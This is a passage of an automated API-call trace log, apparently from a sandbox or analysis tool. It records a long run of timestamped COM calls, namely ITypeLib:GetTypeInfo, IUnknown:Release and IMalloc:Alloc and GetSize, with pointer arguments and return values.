(This=0xb4cd278) returned 0x1 [0031.229] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x31, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd2d0) returned 0x0 [0031.230] IUnknown:Release (This=0xb4cd2d0) returned 0x1 [0031.230] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x32, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd328) returned 0x0 [0031.231] IUnknown:Release (This=0xb4cd328) returned 0x1 [0031.231] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x33, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd380) returned 0x0 [0031.232] IUnknown:Release (This=0xb4cd380) returned 0x1 [0031.232] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x34, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd3d8) returned 0x0 [0031.233] IUnknown:Release (This=0xb4cd3d8) returned 0x1 [0031.233] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x35, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd430) returned 0x0 [0031.234] IUnknown:Release (This=0xb4cd430) returned 0x1 [0031.234] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x36, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd488) returned 0x0 [0031.234] IUnknown:Release (This=0xb4cd488) returned 0x1 [0031.234] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x37, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd4e0) returned 0x0 [0031.235] IUnknown:Release (This=0xb4cd4e0) returned 0x1 [0031.235] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x38, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd538) returned 0x0 [0031.235] IUnknown:Release (This=0xb4cd538) returned 0x1 [0031.235] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x39, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd590) returned 0x0 [0031.236] IUnknown:Release (This=0xb4cd590) returned 0x1 [0031.236] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd5e8) returned 0x0 [0031.236] IUnknown:Release (This=0xb4cd5e8) returned 0x1 [0031.236] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd640) returned 0x0 [0031.236] IUnknown:Release (This=0xb4cd640) returned 0x1 [0031.236] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd698) returned 0x0 [0031.237] IUnknown:Release (This=0xb4cd698) returned 0x1 [0031.237] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd6f0) returned 0x0 [0031.237] IUnknown:Release (This=0xb4cd6f0) returned 0x1 [0031.237] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd748) returned 0x0 [0031.238] IUnknown:Release (This=0xb4cd748) returned 0x1 [0031.238] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x3f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd7a0) returned 0x0 [0031.238] IUnknown:Release (This=0xb4cd7a0) returned 0x1 [0031.238] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x40, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd7f8) returned 0x0 [0031.240] IUnknown:Release (This=0xb4cd7f8) returned 0x1 [0031.240] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x43, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd9b0) returned 0x0 [0031.240] IUnknown:Release (This=0xb4cd9b0) returned 0x1 [0031.240] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cded8) returned 0x0 [0031.240] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491a90 [0031.240] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x18 [0031.246] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.246] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.246] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.246] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.246] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.246] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.246] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666c60 [0031.246] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c60) returned 0x20 [0031.246] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbb40 [0031.246] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dbb40) returned 0x30 [0031.246] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e6820 [0031.246] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e6820) returned 0x48 [0031.247] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.247] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.247] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.247] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.247] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.247] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.247] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.247] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.247] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.247] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.248] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.248] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.248] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.248] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.248] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.248] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.248] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.248] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.249] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.249] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.249] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.249] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.249] IUnknown:Release (This=0xb4cded8) returned 0x1 [0031.249] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x4c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cdf88) returned 0x0 [0031.249] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491a90 [0031.249] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x18 [0031.250] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.250] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.250] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.250] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.250] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.250] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.250] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666c90 [0031.250] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c90) returned 0x20 [0031.250] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbb40 [0031.250] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dbb40) returned 0x30 [0031.250] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e6820 [0031.251] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e6820) returned 0x48 [0031.251] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.251] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.251] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.251] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.251] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.251] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.251] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.251] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.252] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.252] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666c60 [0031.252] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c60) returned 0x20 [0031.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491a90 [0031.252] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x18 [0031.252] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666c60 [0031.252] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c60) returned 0x20 [0031.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.253] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491a90) returned 0x10 [0031.253] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.253] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.253] IUnknown:Release (This=0xb4cdf88) returned 0x1 [0031.253] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x5b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ce980) returned 0x0 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbb40 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666c60 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666c90 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dbb80 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666090 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76db480 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666cf0 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666d20 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666d50 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666db0 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666de0 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666e70 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7667110 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7667020 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666f60 [0031.254] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7667680 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666c00 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666bd0 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666ba0 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666b70 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666b10 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dba00 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666ae0 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666ab0 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666a80 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666a50 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76669f0 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666990 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666960 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666930 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666900 [0031.255] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76668d0 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76db7c0 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dbc00 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbbc0 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbd40 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76668a0 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666840 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666810 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76667e0 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76667b0 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dbc40 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dbc80 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666780 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666750 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76666f0 [0031.256] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbe00 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbe40 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbe80 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbec0 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76666c0 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666690 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666660 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666630 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76665d0 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76665a0 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666570 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666540 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x76664e0 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x76664b0 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491910 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917d0 [0031.257] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491810 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491550 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491390 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a50 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916b0 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491650 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491530 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491930 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491470 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ab0 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491430 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491770 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491010 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a10 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491870 [0031.258] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a30 [0031.259] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0031.259] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918d0 [0031.260] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fb0 [0031.260] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919f0 [0031.260] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918f0 [0031.260] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491510 [0031.260] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491450 [0031.261] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491950 [0031.261] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491670 [0031.261] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491070 [0031.261] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x18 [0031.266] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.266] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.266] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.266] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.266] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.266] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.267] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666480 [0031.267] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666480) returned 0x20 [0031.267] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbf00 [0031.267] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dbf00) returned 0x30 [0031.267] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e6820 [0031.267] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e6820) returned 0x48 [0031.268] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.268] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.268] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.268] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.268] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.268] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.268] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.268] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.268] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.269] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.269] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.269] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.269] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.269] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.269] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.269] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.270] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.270] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.270] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.270] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.270] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.270] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.270] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.270] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.271] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.271] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.271] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.271] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.271] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.271] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.271] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.271] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.272] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.272] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.272] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.272] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.272] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.272] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.272] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.272] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.272] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.272] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.273] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.273] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.273] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.273] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.273] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.273] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.273] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.273] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.273] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.273] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.273] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.273] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.274] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.274] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.274] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.274] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.274] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.274] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.274] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.274] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.275] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.275] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.275] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.275] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.275] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.275] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.276] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.276] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.276] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.276] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.276] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.276] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.276] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.277] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.277] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.277] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.277] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.277] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.277] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.277] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.278] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.278] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491070) returned 0x10 [0031.278] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.278] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.278] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.278] 